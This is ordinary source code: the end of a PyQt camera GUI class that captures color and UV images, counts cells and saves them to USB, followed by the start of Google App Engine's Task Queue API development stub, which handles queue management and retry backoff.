self.settingsWidget.tabs.setCurrentIndex(0)
self.settingsWidget.tabs.blockSignals(False)
#set leds
self.hardwareHandler.switchCOLOR_LED(True)
self.hardwareHandler.switchUV_LED (False)
self.hardwareHandler.updateCaptureSettings(mode = self.mode)
### button events ###
def trigger(self):
self.page1Widget.setEnabled(False)
logger.info("Fetching image")
self.infoTextBox.setText("Fetching image")
self.imageWidget.stopShowLive()
self.hardwareHandler.stopCapturing()
def run():
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = self.mode)
self.imageWidget.shwoFullImage(fullImage)
self.triggeringDoneSignal.emit()
thread = threading.Thread(target = run)
thread.start()
def triggeringDone(self):
self.controlWidget.setCurrentIndex(1)
self.page1Widget.setEnabled(True)
self.infoTextBox.setText("Ready")
def backToPreview(self):
self.infoTextBox.setText("Live capturing")
self.controlWidget.setCurrentIndex(0)
self.imageWidget.annotatedImage = None
self.hardwareHandler.startCapturing(mode = self.mode)
self.imageWidget.startShowLive()
def triggerAndSave(self):
def run():
#stop captureing
self.imageWidget.stopShowLive()
self.hardwareHandler.stopCapturing()
#set gui info
self.controlWidget.setCurrentIndex(4)
self.triggerAndSaveLabel.setText("Capture color Image\t\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
# use timestamp for file names
timeStamp = datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
########## color image ##########
# set color leds
self.hardwareHandler.switchCOLOR_LED(True)
self.hardwareHandler.switchUV_LED (False)
#capture image
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = "Color")
#show image
self.imageWidget.shwoFullImage(fullImage)
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
self.saveImage(fileName=f"{timeStamp}_color")
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t\n"
"Save UV Image\t\t")
########## UV image ##########
# set UV leds
self.hardwareHandler.switchCOLOR_LED(False)
self.hardwareHandler.switchUV_LED (True)
#capture image
fullImage = self.hardwareHandler.shootImage_fullResolution(mode = "UV")
#show image
self.imageWidget.shwoFullImage(fullImage)
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t-> done\n"
"Save UV Image\t\t")
self.saveImage(fileName=f"{timeStamp}_UV")
self.triggerAndSaveLabel.setText("Capture color Image\t-> done\n"
"Save color Image\t\t-> done\n"
"Capture UV Image\t-> done\n"
"Save UV Image\t\t")
self.backToPreviewSignal.emit()
thread = threading.Thread(target = run)
thread.start()
def startCounting(self):
logger.info("Counting...")
self.infoTextBox.setText("Counting...")
self.countingThread = threading.Thread(target = self.count)
self.countingThread.start()
self.controlWidget.setCurrentIndex(3)
# def stopCounting(self):
# logger.info("Counting stopped")
# self.infoTextBox.setText("Counting stopped")
# self.controlWidget.setCurrentIndex(1)
def countingDone(self):
logger.info("Counting done")
self.infoTextBox.setText("Counting done")
cells = self.cellsQueue.get()
logger.info(f"{len(cells)} cells found")
self.imageWidget.markCells(cells)
self.controlWidget.setCurrentIndex(1)
def count(self):
cells = getCells(self.imageWidget.fullImage)
self.cellsQueue.put(cells)
self.countingDoneSignal.emit()
@pyqtSlot(str)
def openErrorMessage(self, msg):
logger.fatal(msg)
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Critical)
msgBox.setText(msg)
msgBox.setWindowTitle("Error")
msgBox.exec_()
def saveImage(self, fileName = None):
"""save image to usb file. default file name is timestamp
:param str fileName: ending .tiff is added automatically"""
self.infoTextBox.setText("Saving image")
self.page2Widget.setEnabled(False)
try:
usbPath = util.getUsbDevicePath()
except IndexError:
self.page2Widget.setEnabled(True)
self.infoTextBox.setText("Saving failed")
self.errorSignal.emit("No USB device found - file was not saved")
return
if fileName is None:
fileName = datetime.now().strftime("%d_%m_%Y_%H_%M_%S")
cv2.imwrite(os.path.join(usbPath, fileName + ".tiff"), cv2.cvtColor(self.imageWidget.fullImage , cv2.COLOR_RGB2BGR))
if isinstance(self.imageWidget.annotatedImage, np.ndarray):
cv2.imwrite(os.path.join(usbPath, fileName + "_annotated.tiff"), cv2.cvtColor(self.imageWidget.annotatedImage, cv2.COLOR_RGB2BGR))
logger.info("Saved File to " + usbPath)
self.page2Widget.setEnabled(True)
self.infoTextBox.setText("Image saved")
|
taskqueue_stub.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import datetime
import logging
import os
import random
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.api import request_info
from google.appengine.api.taskqueue import taskqueue
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskexecutioncount',
'x-appengine-taskpreviousresponse',
'x-appengine-taskretrycount',
'x-appengine-tasketa',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
A datetime.timedelta with the microseconds field not filled.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task_response.eta_usec()))))
headers.append(('X-AppEngine-Development-Payload', '1'))
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task_response.execution_count())))
if task_response.has_runlog() and task_response.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task_response.runlog().response_code())))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this queue is not based on a
queue.yaml file use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
Takes the ETA of the task in seconds since the epoch, the queue_name
and a task name. May be None if automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
oldest_eta = queue.Oldest()
if oldest_eta:
queue_dict['oldest_task'] = _FormatEta(oldest_eta)
queue_dict['eta_delta'] = _EtaDelta(oldest_eta, now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
if queue.retry_parameters:
retry_proto = queue.retry_parameters
retry_dict = {}
if retry_proto.has_retry_limit():
retry_dict['retry_limit'] = retry_proto.retry_limit()
if retry_proto.has_age_limit_sec():
retry_dict['age_limit_sec'] = retry_proto.age_limit_sec()
if retry_proto.has_min_backoff_sec():
retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec()
if retry_proto.has_max_backoff_sec():
retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec()
if retry_proto.has_max_doublings():
retry_dict['max_doublings'] = retry_proto.max_doublings()
queue_dict['retry_parameters'] = retry_dict
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
raise TypeError(
'_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
retry_parameters = None
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.retry_parameters:
retry_parameters = queueinfo.TranslateRetryParameters(
entry.retry_parameters)
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl, retry_parameters=retry_parameters,
target=entry.target)
else:
queue = self._queues[queue_name]
queue.bucket_size = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
queue.retry_parameters = retry_parameters
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues - new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
queue_name = request.queue_name()
response = self._ValidateQueueName(queue_name)
is_unknown_queue = (
response == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
if response != taskqueue_service_pb.TaskQueueServiceError.OK and (
not is_unknown_queue):
raise apiproxy_errors.ApplicationError(response)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None, target=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self.target = target
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
